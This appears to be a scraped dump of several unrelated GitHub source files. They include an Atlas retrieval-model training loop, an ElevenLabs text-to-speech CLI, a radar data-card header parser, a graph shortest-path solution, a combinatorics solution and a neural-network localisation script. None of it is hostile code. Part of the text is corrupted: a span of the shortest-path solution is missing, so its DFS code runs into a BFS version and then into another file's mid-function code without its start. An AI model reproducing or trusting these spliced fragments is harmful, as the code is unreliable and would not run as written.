repeat_if_less_than_world_size=True, opt=opt\n )\n \n data_iterator = filter(None, map(task.process, data_iterator))\n data_iterator = task.batch_iterator(\n data_iterator, opt.per_gpu_batch_size, drop_last=True, shuffle=opt.shuffle)\n logger.info(f\"data iterator done:{opt.train_data}\")\n\n for i, batch in enumerate(data_iterator):\n t0 = time.time()\n # iter_stats = {}\n model.train()\n # logger.info(\"mod trn\")\n if not opt.use_file_passages and index_refresh_scheduler.is_time_to_refresh(step):\n # logger.info(\"refresh index inserted\")\n # Dont refresh index if just loaded it\n if not (step == 0 and opt.load_index_path is not None):\n indexing_start = time.time()\n \n unwrapped_model.build_index(\n index, passages, opt.per_gpu_embedder_batch_size, logger)\n \n # print(\"## rebuilt index\", time.time()-indexing_start )\n logger.info(f\"rebuilt index: {time.time()-indexing_start}\")\n # iter_stats[\"runtime/indexing\"] = (\n # time.time() - indexing_start, 1)\n\n if opt.save_index_path is not None:\n 
save_embeddings_and_index(index, opt)\n logger.info(\"save embds\")\n exit()\n # print(\"## saved index\", opt.save_index_n_shards)\n \n step += 1\n step_count += 1\n # train_step_start = time.time()\n # print(\"## indexin finished\")\n # print(\"## query \", len(batch[\"query\"]), batch[\"query\"][0] )\n\n # logger.info(\"step started\")\n # # queries = batch size that is passed to model\n \n reader_loss, retriever_loss, retriever_graph_loss = model(\n index=index,\n query=batch[\"query\"],\n target=batch[\"target\"],\n target_tokens=batch.get(\"target_tokens\"),\n passages=batch[\"passages\"] if opt.use_file_passages else None,\n batch_metadata=batch.get(\"metadata\"),\n filtering_fun=task.filter,\n train_retriever=opt.train_retriever and step > opt.freeze_retriever_steps,\n iter_stats={},\n # iter_stats=iter_stats,\n )\n # logger.info(\"step computed\")\n # print(\"## loss comp finished\", reader_loss,\n # retriever_loss, retriever_graph_loss)\n # wandb.log({\"reader loss\": reader_loss, \"retriever loss\": retriever_loss,\n # \"retreiver_graph loss\": retriever_graph_loss})\n # mlflow.log_metric(\"reader_loss\", reader_loss)\n # mlflow.log_metric(\"retriever_loss\", retriever_loss)\n # mlflow.log_metric(\"retreiver_graph_loss\", retriever_graph_loss)\n\n if retriever_loss is not None and opt.train_retriever and retriever_graph_loss is not None:\n train_loss = reader_loss.float() + retriever_loss + retriever_graph_loss\n elif retriever_loss is not None and opt.train_retriever:\n train_loss = reader_loss.float() + retriever_loss\n else:\n train_loss = reader_loss\n\n # iter_stats[\"loss/train_loss\"] = (train_loss.item(),\n # len(batch[\"query\"]))\n\n # backward_start = time.time()\n train_loss = scale * train_loss\n train_loss.backward()\n # iter_stats[\"runtime/backward\"] = (time.time() - backward_start, 1)\n\n # model_update_start = time.time()\n stats = util.compute_grad_stats(model)\n if stats[\"skip_example\"]:\n model.zero_grad()\n # continue\n else:\n for k, v in stats.items():\n grad_stats[k].append(v)\n\n if len(grad_stats[\"max\"]) >= THRESHOLD_GRAD_STATS:\n if np.mean(grad_stats[\"max\"]) > GRAD_SCALE_UPPER_BOUND_MEAN:\n scale /= 2\n elif np.mean(grad_stats[\"mean\"]) < GRAD_SCALE_LOWER_BOUND_MEAN:\n scale *= 2\n # print(f'Scale: {scale}')\n grad_stats.clear()\n\n if step % opt.accumulation_steps == 0 and not stats[\"skip_example\"]:\n if opt.is_distributed and opt.shard_optim:\n optimizer.clip_grad_norm(scale * opt.clip)\n if opt.train_retriever:\n retr_optimizer.clip_grad_norm(scale * opt.clip)\n if opt.train_retriever and retriever_graph_loss is not None:\n retr_graph_optimizer.clip_grad_norm(scale * opt.clip)\n else:\n torch.nn.utils.clip_grad_norm_(\n model.parameters(), scale * opt.clip)\n\n optimizer.step(scale=scale) # reader weights update\n scheduler.step()\n if opt.train_retriever:\n # retriever weights update\n retr_optimizer.step(scale=scale)\n retr_scheduler.step()\n if retriever_graph_loss is not None:\n retr_graph_optimizer.step(scale=scale)\n retr_graph_scheduler.step()\n\n model.zero_grad()\n # iter_stats[\"runtime/model_update\"] = (\n # time.time() - model_update_start, 1)\n # iter_stats[\"runtime/train_step\"] = (\n # time.time() - train_step_start, 1)\n # run_stats.update(iter_stats)\n\n # wandb.log({\"timeperstep\": time.time() - t0})\n # mlflow.log_metric(\"timeperstep\", time.time() - t0)\n\n # if step % opt.log_freq == 0:\n # log = f\"{step} / {opt.total_steps}\"\n # for k, v in sorted(run_stats.average_stats.items()):\n # log += f\" | {k}: 
{v:.3g}\"\n # if tb_logger:\n # tb_logger.add_scalar(k, v, step)\n # log += f\" | lr: {scheduler.get_last_lr()[0]:0.2g}\"\n # log += f\" | Memory: {torch.cuda.max_memory_allocated()//1e9} GiB\"\n # if tb_logger:\n # tb_logger.add_scalar(\n # \"lr\", scheduler.get_last_lr()[0], step)\n\n # logger.info(log)\n # run_stats.reset()\n\n if step % opt.eval_freq == 0:\n for data_path in opt.eval_data:\n dataset_name = os.path.basename(data_path)\n\n ##### call evaluate.py script ######\n metrics = evaluate(model, index, opt, data_path, step)\n log_message = f\"Dataset: {dataset_name}\"\n for k, v in metrics.items():\n log_message += f\" | {v:.3f} {k}\"\n if tb_logger:\n tb_logger.add_scalar(\n f\"{dataset_name}/{k}\", v, step)\n logger.info(log_message)\n\n if step % opt.save_freq == 0 and opt.is_main:\n save_atlas_model(\n unwrapped_model,\n optimizer,\n scheduler,\n retr_optimizer,\n retr_scheduler,\n step,\n opt,\n checkpoint_path,\n f\"step-{step}\",\n retr_graph_optimizer,\n retr_graph_scheduler,\n )\n # print(\"## step\", step)\n if step_count > 300:\n logger.info(f\"step, total time: {step,step_count, time.time() - t1}\")\n return\n # exit()\n\n # print(\"step\", i)\n # epoch_count = epoch_count + 1\n # print(\"step/epoch time\", time.time() - t0)\n\n\ndef _get_eval_data_iterator_forindexsel(opt, data_path, task):\n data_iterator = task.data_iterator(\n data_path, opt.global_rank, opt.world_size, opt=opt, is_eval=True)\n data_iterator = filter(None, map(task.process, data_iterator))\n ## edit by sai\n # data_iterator = list(task.batch_iterator(\n # data_iterator, opt.per_gpu_batch_size))\n data_iterator = list(task.batch_iterator(\n data_iterator, opt.per_gpu_batch_size_domainindex))\n\n if dist.is_initialized():\n len_data = torch.tensor(\n len(data_iterator), device=torch.device(\"cuda\"))\n dist.all_reduce(len_data, torch.distributed.ReduceOp.MAX)\n dist.barrier()\n if len(data_iterator) < len_data.item():\n data_iterator.extend(\n [{} for _ in range(len_data.item() - len(data_iterator))])\n\n return data_iterator\n\n## edit by sai\n## function to select domain index from the batch query\n@torch.no_grad()\ndef get_domainindex(model, opt, data_path, domain_wise_index_vec, domain_map_names):\n model.eval()\n # metrics = defaultdict(lambda: [])\n # dataset_wpred = []\n unwrapped_model = util.get_unwrapped_model_if_wrapped(model)\n reader_tokenizer = unwrapped_model.reader_tokenizer\n\n task = get_task(opt, reader_tokenizer)\n data_iterator = _get_eval_data_iterator_forindexsel(opt, data_path, task)\n\n for i, batch in enumerate(data_iterator):\n query = batch.get(\"query\", [\"\"])\n logger.info(f\"len query 0: {len(query),len(query[0])}\")\n # get only input\n query = [ele.split(\"###\")[3] for ele in query]\n # logger.info(f\"query shape:{len(query),query[0]}\")\n answers = batch.get(\"target\", [\"\"])\n # batch_metadata = batch.get(\"metadata\")\n target_tokens = batch.get(\"target_tokens\")\n query_enc, labels, decoder_input_ids = unwrapped_model.tokenize(\n query, answers, target_tokens=target_tokens)\n\n query_ids_retriever = query_enc[\"input_ids\"].cuda()\n query_mask_retriever = query_enc[\"attention_mask\"].cuda()\n\n logger.info(f\"len query: {len(query),len(query[0])}\")\n # logger.info(f\"query: {query[0]}\")\n # logger.info(f\"domain vec shape: {domain_wise_index_vec.shape}\")\n ## get batch query embedding vectors\n\n selected_domain_name = unwrapped_model.get_topdomain_index_name(\n query,\n query_ids_retriever,\n query_mask_retriever,\n domain_wise_index_vec,\n 
domain_map_names,\n opt.no_sel_indices\n )\n\n # If example is a padding example then skip step\n if (len(query) == 0) or (len(query[0]) == 0):\n continue\n \n break\n\n selected_domain_name = \",\".join(selected_domain_name)\n\n return selected_domain_name\n\nif __name__ == \"__main__\":\n options = get_options()\n opt = options.parse()\n\n torch.manual_seed(opt.seed)\n slurm.init_distributed_mode(opt)\n slurm.init_signal_handler()\n\n checkpoint_path, saved_index_path = create_checkpoint_directories(opt)\n\n logger = util.init_logger(\n opt.is_main, opt.is_distributed, os.path.join(checkpoint_path, \"run.log\"))\n if opt.is_main:\n options.print_options(opt)\n\n logger.info(f\"world size: {dist_utils.get_world_size()}\")\n\n ## edit by sai \n ## gen representing vector for each domain index \n if opt.gen_textdomain_representation_vec:\n for subset_textindex_name in opt.subset_textindex_name.split(\",\"):\n # logger.info(f\"subsetname: {subset_textindex_name}\")\n index = DistributedIndex()\n index.gen_representing_index(opt.load_index_path, opt.save_index_n_shards, opt.load_subset_textindex, subset_textindex_name)\n del index\n exit()\n \n # print(\"----index emb---\", index.embeddings.detach().cpu()[:, 0])\n # reader params: 247M, retriever: 108M, GNN:3M (3152896)\n\n model, optimizer, scheduler, retr_optimizer, retr_scheduler, opt, step, \\\n retr_graph_optimizer, retr_graph_scheduler = load_or_initialize_atlas_model(\n opt)\n\n # index, passages = load_or_initialize_index(opt)\n \n # print(sum(p.numel()\n # for p in model.retriever.parameters() if p.requires_grad))\n # print(sum(p.numel()\n # for p in model.reader.parameters() if p.requires_grad))\n # print(sum(p.numel()\n # for p in model.retriever_graph.parameters() if p.requires_grad))\n\n if opt.is_distributed:\n if opt.shard_grads:\n import fairscale.nn.data_parallel\n\n model.reader = fairscale.nn.data_parallel.ShardedDataParallel(\n model.reader, optimizer, auto_refresh_trainable=False\n )\n if opt.train_retriever:\n model.retriever = fairscale.nn.data_parallel.ShardedDataParallel(\n model.retriever, retr_optimizer, auto_refresh_trainable=False\n )\n if opt.train_retriever & opt.retrieve_with_rerank_bygraph:\n model.retriever_graph = fairscale.nn.data_parallel.ShardedDataParallel(\n model.retriever_graph, retr_graph_optimizer, auto_refresh_trainable=False\n )\n # model.retriever = fairscale.nn.data_parallel.ShardedDataParallel(\n # model.retriever, retr_optimizer, retr_graph_optimizer, auto_refresh_trainable=False\n # )\n else:\n model = torch.nn.parallel.DistributedDataParallel(\n model,\n device_ids=[opt.local_rank],\n output_device=opt.local_rank,\n find_unused_parameters=True,\n )\n model._set_static_graph()\n\n logger.info(\"Start training\")\n dist_utils.barrier()\n logger.info(\"call training\")\n\n # load domain representing vector\n domain_map_names = {\n 0: \"Art\",\n 1: \"Geography\",\n 2: \"History\",\n 3: \"Sociology\",\n 4: \"Philosophy\",\n 5: \"Political-Science\",\n 6: \"Psychology\",\n 7: \"Business\",\n 8: \"Economics\",\n 9: \"Geology\",\n 10: \"Bio-1\",\n 11: \"Mathematics\",\n 12: \"Computer-Science\",\n 13: \"Environmental-Science\",\n 14: \"Engineering\",\n 15: \"Materials-Science\",\n 16: \"Bio-2\",\n 17: \"Physics\",\n 18: \"Chemistry\",\n 19: \"Med-1\",\n 20: \"Med-2\",\n 21: \"Med-3\",\n 22: \"Med-4\"\n }\n\n domain_list = ['Art','History', 'Sociology', \n 'Philosophy', 'Political-Science','Psychology', \n 'Geology', 'Mathematics','Engineering','Economics',\n 'Computer-Science', 
'Environmental-Science','Business',\n 'Materials-Science', 'Biology', 'Physics','Chemistry',\n 'Medicine','Materials science','Political science','Law']\n \n domain_vector_list = [torch.load(opt.load_index_path+domain_map_names[ele]+\"/mean_emb.pt\") for ele in range(len(domain_map_names))]\n domain_wise_index_vec = torch.cat(domain_vector_list, dim=1)\n logger.info(f\"domain_wise_index_vec mean {torch.mean(domain_wise_index_vec,dim=0)}\") \n \n ## edit by sai ##\n ## load data and group by topic ##\n df = pd.read_json(opt.train_data[0], lines=True)\n\n df = df.loc[df['target'].isin(domain_list)]\n grouped = df.groupby(['target'])\n logger.info(f\"groupby size: {grouped.size(), len(grouped),opt.train_data}\")\n\n ## load index models\n index_model, _, _, _, _, _, _, _, _ = load_or_initialize_atlas_model_forindex(opt, eval_only=True)\n \n ## loop for repeatation\n for count_iteration in range(2):\n logger.info(f\"IYERATION:{count_iteration}\")\n\n ## loop for each dataset\n for name,group in grouped:\n\n data_path = os.path.dirname(opt.train_data[0])+\"/instructions_sample_\" + name[0] + \".jsonl\"\n \n if not os.path.exists(data_path):\n group.to_json(data_path, orient='records', lines=True)\n\n # for data_path in [eval_file]: #TODO change loop variable for multiple eval files\n dataset_name = os.path.basename(data_path) \n logger.info(f\"Start Evaluation on {data_path}\")\n\n try:\n selected_domain_name = get_domainindex(index_model, opt, data_path, domain_wise_index_vec, domain_map_names)\n logger.info(f\"sel domain index {selected_domain_name}\")\n\n ## load selected index \n index, passages = load_subset_index(opt, selected_domain_name)\n \n opt.train_data = [data_path]\n\n train(\n model,\n index,\n passages,\n optimizer,\n scheduler,\n retr_optimizer,\n retr_scheduler,\n retr_graph_optimizer,\n retr_graph_scheduler,\n step,\n opt,\n checkpoint_path,\n )\n except:\n logger.info(f\"break Evaluation on {data_path}\")\n continue\n step = step+300\n\n# mlflow.end_run()","repo_name":"pnnl/EXPERT2","sub_path":"model/custom_train_adapretr.py","file_name":"custom_train_adapretr.py","file_ext":"py","file_size_in_byte":19268,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"3810962477","text":"import argparse\nimport io\nimport os\nimport sys\nimport subprocess\nimport requests\nimport xml.etree.ElementTree as ET\nimport sys\nfrom bs4 import BeautifulSoup\nimport re\nimport json\nfrom tabulate import tabulate\n# Supress unncessary pygame prompt\nos.environ['PYGAME_HIDE_SUPPORT_PROMPT'] = \"hide\"\nimport pygame\n\ndef is_tool(name):\n \"\"\"Check whether `name` is on PATH.\"\"\"\n\n from shutil import which\n\n return which(name) is not None\n\ndef get_voices(api_key):\n url = \"https://api.elevenlabs.io/v1/voices\"\n headers = {\"xi-api-key\": api_key}\n response = requests.get(url, headers=headers)\n\n if response.status_code == 200:\n data = response.json()\n voices = data[\"voices\"]\n table_data = [\n [\n voice[\"voice_id\"],\n voice[\"name\"],\n voice[\"category\"],\n ]\n for voice in voices\n ]\n print(tabulate(table_data, headers=[\"Voice ID\", \"Name\", \"Category\"]))\n else:\n print(f\"Error: {response.text}\")\n\n\n\n\ndef url_to_text(url):\n response = requests.get(url)\n soup = BeautifulSoup(response.content, 'html.parser')\n article = soup.find('article')\n\n # Remove unnecessary sections\n for section in article.find_all(['aside', 'header', 'footer', 'figure', 'figcaption', 'nav', 'script']):\n section.decompose()\n\n 
# Remove hyperlinks and images from the article\n for link in article.find_all('a'):\n link.decompose()\n for img in article.find_all('img'):\n img.decompose()\n\n # Extract the text from the article\n text = article.get_text(separator=' ')\n\n # Remove unwanted characters and normalize whitespace\n text = re.sub(r'[\\n]+', '\\n', text)\n text = re.sub(r'[/;:]', '', text)\n text = re.sub(r'\\d{4}', '', text)\n text = re.sub(r'[\\n]*\\w*Comments[\\n]*', '', text)\n text = re.sub(r'(\\n\\s*)+\\n+', '\\n\\n', text).strip()\n text = re.sub(r' +', ' ', text)\n text = re.sub(r' ?([.,?!])', r'\\1', text)\n\n # Remove other unwanted patterns\n text = re.sub(r'Listen\\s+\\d+\\s+min.*Share', '', text)\n text = re.sub(r'Most Popular', '', text)\n text = re.sub(r'From our sponsor', '', text)\n\n return text\n\ndef play_audio(voice_id, api_key, text, endpoint, audio_file_name):\n \"\"\"Plays audio by making a TTS API request.\n\n Args:\n voice_id: The ID of the voice to use.\n api_key: The API key to authenticate the request.\n text: The text to convert to speech.\n endpoint: The TTS API endpoint to use.\n audio_file_name: The name of the audio file to be created\n \"\"\"\n\n api_endpoint = f\"https://api.elevenlabs.io/v1/text-to-speech/{voice_id}\"\n if endpoint == \"stream\":\n api_endpoint += \"/stream\"\n\n headers = {\n \"xi-api-key\": api_key\n }\n data = {\n \"text\": text\n }\n\n response = requests.post(api_endpoint, headers=headers, json=data)\n\n if response.status_code == 200:\n if endpoint == \"stream\":\n pygame.init() # To use a custom sound device, use pygame.mixer.init(devicename='name_of_device') here\n sound = pygame.mixer.Sound(io.BytesIO(response.content))\n sound.play()\n while pygame.mixer.get_busy():\n pygame.time.wait(100)\n else:\n with open(audio_file_name, \"wb\") as f:\n f.write(response.content)\n if os.name == 'nt': # If on Windows, use Windows Media Player\n subprocess.call([\"wmplayer\", \"/play\", \"/close\", audio_file_name])\n elif sys.platform == 'darwin': # If on Mac, use afplay\n subprocess.call([\"afplay\", audio_file_name])\n elif sys.platform == 'linux': # If on Linux, use aplay\n subprocess.call([\"mpv\", audio_file_name])\n else:\n print(f\"Unsupported platform: {os.name}\")\n else:\n print(f\"Error: {response.text}\")\n\ndef get_news_by_category(category):\n \"\"\"Returns the news for the given category by parsing an RSS feed.\n\n Args:\n category: The name of the category to retrieve news for.\n\n Returns:\n The concatenated titles and descriptions of the news articles.\n \"\"\"\n categories = {\n \"ai\": \"https://www.wired.com/feed/tag/ai/latest/rss\",\n \"gear\": \"https://www.wired.com/feed/category/gear/latest/rss\",\n \"business\": \"https://www.wired.com/feed/category/business/latest/rss\",\n \"culture\": \"https://www.wired.com/feed/category/culture/latest/rss\",\n \"science\": \"https://www.wired.com/feed/category/science/latest/rss\",\n \"security\": \"https://www.wired.com/feed/category/security/latest/rss\",\n }\n url = categories.get(category)\n if not url:\n return None\n\n response = requests.get(url)\n root = ET.fromstring(response.content)\n news_articles = root.findall(\".//item\")\n text = \"\"\n for article in news_articles:\n title = article.find(\"title\").text\n description = article.find(\"description\").text\n text += f\"{title}\\n{description}\\n\\n\"\n\n return text\n\n# Check if required playback tools on linux are installed\nif sys.platform == 'linux' and not is_tool('mpv'):\n print(\"\\n'mpv' is not installed. 
Please install it to continue.\\n\")\n print(\"\\033[1m sudo apt install mpv\\n\\033[0m\")\n sys.exit(1)\n\nparser = argparse.ArgumentParser()\ngroup1 = parser.add_mutually_exclusive_group(required=True)\ngroup1.add_argument(\"-a\", \"--audio\", help=\"Use /v1/text-to-speech API endpoint\", action=\"store_const\", dest=\"endpoint\", const=\"audio\")\ngroup1.add_argument(\"-s\", \"--stream\", help=\"Use /v1/text-to-speech/{voice_id}/stream API endpoint\", action=\"store_const\", dest=\"endpoint\", const=\"stream\")\ngroup1.add_argument(\"--get-voices\", help=\"Retrieve the available voices\", action=\"store_true\")\n\nparser.add_argument(\"-v\", \"--voice-id\", help=\"The ID of the voice to use\")\n\ngroup2 = parser.add_mutually_exclusive_group(required=False)\ngroup2.add_argument(\"-t\", \"--text\", help=\"The text to convert to speech\")\ngroup2.add_argument(\"-f\", \"--file\", help=\"Text file to convert to speech\")\ngroup2.add_argument(\"-u\", \"--url\", help=\"BETA: URL of article to convert to speech\")\ngroup2.add_argument(\"--ai\", help=\"Read the latest AI news\", action=\"store_const\", dest=\"category\", const=\"ai\")\ngroup2.add_argument(\"--gear\", help=\"Read the latest gear news\", action=\"store_const\", dest=\"category\", const=\"gear\")\ngroup2.add_argument(\"--business\", help=\"Read the latest business news\", action=\"store_const\", dest=\"category\", const=\"business\")\ngroup2.add_argument(\"--culture\", help=\"Read the latest culture news\", action=\"store_const\", dest=\"category\", const=\"culture\")\ngroup2.add_argument(\"--science\", help=\"Read the latest science news\", action=\"store_const\", dest=\"category\", const=\"science\")\ngroup2.add_argument(\"--security\", help=\"Read the latest security news\", action=\"store_const\", dest=\"category\", const=\"security\")\n\nparser.add_argument(\"-o\", \"--output\", help=\"May be used --audio/-a only. The name of the audio file to be created. 
If not specified, defaults to output.wav\", dest=\"output\", required=False)\n\nargs = parser.parse_args()\n\napi_key = os.environ.get(\"ELEVENLABS_API_KEY\")\n\nif api_key is None:\n print(\"Error: API_KEY environment variable not set\")\n sys.exit(1)\n\nvoice_id = args.voice_id or \"EXAVITQu4vr4xnSDxMaL\"\nendpoint = args.endpoint\n\nif args.get_voices:\n get_voices(api_key)\nelse:\n voice_id = args.voice_id or \"EXAVITQu4vr4xnSDxMaL\"\n endpoint = args.endpoint\n\nif args.category:\n text = get_news_by_category(args.category)\nelif args.text:\n text = args.text\nelif args.file:\n with open(args.file, \"r\") as f:\n text = f.read()\nelif args.url:\n text = url_to_text(args.url)\nelse:\n text = \"This is an example text to speech conversion.\"\n\ntry:\n if not args.get_voices:\n if args.endpoint == \"stream\":\n if args.output:\n raise Exception(\"Error: -s and -o cannot be used together\")\n audio_file_name = None\n elif args.endpoint == \"audio\":\n audio_file_name = args.output if args.output else \"output.wav\"\n else:\n audio_file_name = None\n\n play_audio(voice_id, api_key, text, endpoint, audio_file_name)\n\nexcept Exception as e:\n print(e)\n sys.exit(1)\n\nexcept KeyboardInterrupt:\n print(\"\\nExiting the program...\")\n sys.exit(0)\n","repo_name":"piercecohen1/AI-TTS","sub_path":"TTS.py","file_name":"TTS.py","file_ext":"py","file_size_in_byte":8299,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"25666362615","text":"import numpy as np\nimport lib.utils as ut\nimport time\n\n\nclass HSIDataCardHeader:\n def __init__(self, buffer):\n self.buffer = buffer\n while buffer.n_elems < 32:\n time.sleep(0.01)\n # ut.precise_sleep(0.01)\n # time.sleep(0.001)\n data = buffer.read(16, update=True)\n # total length = 16 B\n self.id = (bytes(data[:2])+bytes(data[4:6])+bytes(data[2:4])+bytes(data[6:8])).hex()\n # print('id:', self.id)\n\n totalLengthLSW = data[8:10]\n totalLengthLSW.dtype = 'H'\n totalLengthMSW = data[12:14]\n totalLengthMSW.dtype = 'H'\n totalLength = totalLengthMSW * 2**12 + totalLengthLSW\n self.totalLength = totalLength[0]\n\n\nclass HSISDKHeader:\n def __init__(self, datacard_header):\n while datacard_header.buffer.n_elems < datacard_header.totalLength+16:\n ut.precise_sleep(0.001)\n #time.sleep(0.001)\n data = datacard_header.buffer.read(datacard_header.totalLength, update=True)\n version_high = data[1]\n version_low = data[0]\n major = (version_high & 0b1110) >> 1\n minor = ((version_high & 0b1) << 2) | ((version_low & 0b11000000) >> 6)\n bugfix = (version_low & 0b111000) >> 3\n build = version_low & 0b111\n\n self.version = '{}.{}.{}.{}'.format(major, minor, bugfix, build)\n\n header_size = data[4:6]\n header_size.dtype = 'H'\n self.header_size = header_size[0]\n # print('header size: {}B'.format(self.header_size))\n\n platform = data[2]\n self.platform = 'XWR14XX' if platform == 1 else \\\n 'XWR16XX' if platform == 2 else \\\n 'XWR18XX' if platform == 3 else \\\n 'XWR68XX'if platform == 4 else None\n\n self.interleaved = True if data[3] == 1 else False if data[3] == 2 else None\n\n dataSize = data[6]\n dataType = data[7]\n\n self.dataSize = 16 if dataSize == 0 else 14 if dataSize == 1 else 12 if dataSize == 2 else None\n self.dataType = 'Cplx' if dataType == 2 else 'Real' if dataType == 1 else None\n # print('dsize: {} b, dtype: {}, interleaved: {}'.format(self.dataSize, self.dataType, self.interleaved))\n\n self.rxChannelStatus = bin(data[8])\n # print('rxchan', self.rxChannelStatus)\n dataFmt = 
data[9]\n self.dataFmt = 'ADC' if dataFmt == 1 \\\n else 'HW stream disable' if dataFmt == 0 \\\n else 'CP + ADC + CQ' if dataFmt == 4 \\\n else None\n # print('dformat:', self.dataFmt)\n\n chirpMode = data[12:14]\n chirpMode.dtype = 'H'\n self.chirpMode = 'Single chirp' if chirpMode == 1 else 'Multi chirp' if 2 <= chirpMode <= 8 else None\n # print('chirp mode:', self.chirpMode)\n\n adcDataSize = data[10:12]\n adcDataSize.dtype = 'H'\n self.adcDataSize = adcDataSize[0]\n # print('adc data size', adcDataSize[0])\n\n cpDataSize = data[14:16]\n cpDataSize.dtype = 'H'\n self.cpDataSize = cpDataSize[0]\n # print('cp data size', self.cpDataSize)\n\n cqDataSize0 = data[16:18]\n cqDataSize0.dtype = 'H'\n\n cqDataSize1 = data[[20, 22]]\n cqDataSize1.dtype = 'H'\n\n cqDataSize2 = data[18:20]\n cqDataSize2.dtype = 'H'\n\n usrBufSize0 = data[22:24]\n usrBufSize0.dtype = 'H'\n\n usrBufSize1 = data[[24, 26]]\n usrBufSize1.dtype = 'H'\n\n usrBufSize2 = data[28:30]\n usrBufSize2.dtype = 'H'\n\n self.appExtHeader = np.concatenate((data[26:28], data[30:34], data[36:38]))\n\n inquiry = data[46:48]\n k = 0\n while all(inquiry == [15, 15]):\n k += 2\n inquiry = data[46+k: 48+k]\n\n if k == 4 and datacard_header.id == 'dc0ada0cdc0ada0c':\n k = 2\n print('strange event')\n print(k, self.header_size, usrBufSize0, usrBufSize1, usrBufSize2, datacard_header.totalLength)\n\n self.data = data[46+k:]\n self.data.dtype = 'h'\n\n if datacard_header.id == 'dc0ada0cdc0ada0c':\n self.data = self.data.reshape((4, -1), order='F')\n raw_i = self.data[:2, :].flatten(order='F')\n raw_q = self.data[2:, :].flatten(order='F')\n raw_i_ok = raw_i.reshape((-1, 4), order='F')\n raw_q_ok = raw_q.reshape((-1, 4), order='F')\n self.data = raw_i_ok + 1j * raw_q_ok\n","repo_name":"potassacaustica/civil_engineer","sub_path":"iwr1843/hdr/iwr1843_hdr.py","file_name":"iwr1843_hdr.py","file_ext":"py","file_size_in_byte":4383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23775039671","text":"'''\n847. Shortest Path Visiting All Nodes\nHard\n\n2240\n\n117\n\nAdd to List\n\nShare\nYou have an undirected, connected graph of n nodes labeled from 0 to n - 1. You are given an array graph where graph[i] is a list of all the nodes connected with node i by an edge.\n\nReturn the length of the shortest path that visits every node. 
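
For orientation (illustrative, not part of the original file): both solutions below key their memo/queue on a (node, visited-bitmask) pair, giving at most n * 2^n states. A compact standalone BFS over those states:

from collections import deque

def shortest_path_all_nodes(graph):
    n = len(graph)
    if n == 1:
        return 0
    full = (1 << n) - 1
    # seed the BFS with every node as a possible starting point
    queue = deque((i, 1 << i, 0) for i in range(n))
    seen = {(i, 1 << i) for i in range(n)}
    while queue:
        node, mask, dist = queue.popleft()
        for nxt in graph[node]:
            nmask = mask | (1 << nxt)
            if nmask == full:
                return dist + 1
            if (nxt, nmask) not in seen:
                seen.add((nxt, nmask))
                queue.append((nxt, nmask, dist + 1))

assert shortest_path_all_nodes([[1, 2, 3], [0], [0], [0]]) == 4
assert shortest_path_all_nodes([[1], [0, 2, 4], [1, 3, 4], [2], [1, 2]]) == 4
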
You may start and stop at any node, you may revisit nodes multiple times, and you may reuse edges.\n\n \n\nExample 1:\n\n\nInput: graph = [[1,2,3],[0],[0],[0]]\nOutput: 4\nExplanation: One possible path is [1,0,2,0,3]\nExample 2:\n\n\nInput: graph = [[1],[0,2,4],[1,3,4],[2],[1,2]]\nOutput: 4\nExplanation: One possible path is [0,1,4,2,3]\n \n\nConstraints:\n\nn == graph.length\n1 <= n <= 12\n0 <= graph[i].length < n\ngraph[i] does not contain i.\nIf graph[a] contains b, then graph[b] contains a.\nThe input graph is always connected.\nAccepted\n52,092\nSubmissions\n85,570\n'''\n#dfs\nclass Solution:\n def shortestPathLength(self, graph: List[List[int]]) -> int:\n n = len(graph)\n def dp(node, mask):\n state = (node, mask)\n if state in cache: return cache[state]\n if mask & (mask-1) == 0: return 0\n cache[state] = float(\"inf\")\n for neighbor in graph[node]:\n if mask & (1< int:\n n = len(graph)\n if n == 1: return 0\n ending_mask = (1< 0:\n if n & 1:\n res = res * x % MOD\n x = x * x % MOD\n n >>= 1\n return res\n\n\ndef inv(x):\n return mod_pow(x, MOD - 2)\n\n\ndef init():\n global P, Q\n P[0] = 1\n for i in range(1, N + 1):\n P[i] = P[i - 1] * i % MOD\n Q[N] = inv(P[N])\n for i in range(N, 0, -1):\n Q[i - 1] = Q[i] * i % MOD\n\n\ndef mod_com(n, k):\n if k < 0 or n < 0 or n < k:\n return 0\n if k == 0:\n return 1\n return P[n] * Q[n - k] % MOD * Q[k] % MOD\n\n\ninit()\nres = 0\nfor i in range(K - 1, N):\n res = (res + mod_com(i, K - 1) * A[i] % MOD) % MOD\nfor i in range(N - K + 1):\n res = (res - mod_com(N - i - 1, K - 1) * A[i] % MOD + MOD) % MOD\nprint(res)\n","repo_name":"e5pe0n/algorithm-training","sub_path":"AtCoder/ABC/151/python/E_Max_Min_Sums.py","file_name":"E_Max_Min_Sums.py","file_ext":"py","file_size_in_byte":875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23214295811","text":"import numpy as np\nfrom ExtractData import getSamplesAndLabelsFromOneFile, getSamplesAndLabelsFromMultipleFiles, extractData, extractDistinctBSSIDAndNumberOfDataPoints, extractDataFromMultipleFiles\nfrom MatrixManipulation import deterministicSplitMatrix, randomSplitSamplesAndLabels, shuffleMatrices\n\ndef NNOwnDataSet(locations, filename, partOfData, bias, predictsFourthRoom, activationFunction):\n \n trainingSamplesOverall, testSamplesOverall, trainingLabelsOverall, testLabelsOverall = getSamplesAndLabelsFromOneFile(locations, filename, partOfData)\n \n wh, bh, wo, bo, percentageSure, accuracy = bestModelNN(trainingSamplesOverall, trainingLabelsOverall, bias, activationFunction, numberOfClasses=len(locations))\n \n fiveFractile = np.percentile(percentageSure, 5)\n \n if (predictsFourthRoom):\n accuracyFourthRoom, numberOfTestPointsFourthRoom = getAccuracyFourthRoom(locations, filename, partOfData, wh, bh, wo, bo, activationFunction, fiveFractile) \n \n if partOfData == 1: \n if (predictsFourthRoom):\n numberOfTestPoints = int(np.floor(trainingLabelsOverall.shape[0] * 0.2))\n numberOfTestPointsTotal = numberOfTestPoints + numberOfTestPointsFourthRoom\n accuracy = accuracy * numberOfTestPoints / (numberOfTestPointsTotal) + accuracyFourthRoom * numberOfTestPointsFourthRoom / numberOfTestPointsTotal\n \n return accuracy, fiveFractile\n \n predictedLabels, _ = getPredictedLabelsNN(testSamplesOverall, wh, bh, wo, bo, activationFunction, fiveFractile)\n accuracy 